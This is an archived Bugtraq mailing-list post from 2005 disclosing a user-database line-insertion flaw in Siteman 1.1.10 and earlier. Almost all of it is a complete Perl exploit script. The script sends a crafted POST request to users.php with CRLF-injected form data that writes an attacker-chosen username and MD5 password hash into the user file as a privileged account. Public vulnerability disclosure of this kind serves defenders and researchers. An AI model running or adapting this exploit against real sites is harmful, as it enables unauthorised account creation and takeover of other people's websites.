[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Siteman User Database Line Insertion Vulnerability
From:       shoalie sefid <shoaliesefid7 () yahoo ! com>
Date:       2005-01-22 21:21:15
Message-ID: 20050122212115.17676.qmail () www ! securityfocus ! com
[Download RAW message or body]



Siteman User Database Line Insertion Vulnerability

Vulnerable Systems:
 * Siteman version 1.1.10 and prior

Discovered By amironline452 (amiroline452@alphahackers.com)
By Alpha Hackers Digital Security Team
www.alphahackers.com
www.amironline452.tk


Exploit:
#!/usr/bin/perl -w
#
# Exploit by shoaliesefid7 - Alpha Hackers Digital Security Team.
# Exploit for the SiteMan vulnerability discovered by: "amironline452" \
<amironline452@alphahackers.com> #

use Digest::MD5 qw(md5 md5_hex md5_base64);
use IO::Socket;
use strict;


# ./siteman.pl / vulnerable.host
my $Path = shift;
my $Host = shift;
my $Username = shift;
my $Password = md5_hex(shift);

print "Path: $Path\nHost: $Host\nUsername: $Username\nPassword: $Password\n";

my $content = "do=docreate&line=%0A%0D$Username|$Password|5|$Username\@hacked.com|". \
"$Username|1105956827|$Username|$Password|0|0|0|hackers%0A%0D";

my $request = "POST $Path/users.php HTTP/1.1\r
Host: $Host\r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040928 \
                Firefox/0.9.3\r
Accept: text/html;q=0.9,text/plain;q=0.8,*/*;q=0.5\r
Accept-Language: en-us,en;q=0.5\r
Accept-Encoding: gzip,deflate\r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r
Content-Length: ".length($content)."\r
Content-Type: application/x-www-form-urlencoded\r
Connection: close\r
\r
$content";

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $Host, PeerPort => \
"8080");

unless ($remote) { die "cannot connect to http daemon on $Host" }

print "connected\n";

print "request: [$request]\n";
print $remote $request. "\r\n";

while (<$remote>)
{
 print $_;
}

close ($remote);

print "\n\n--- done ---\n"; 


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic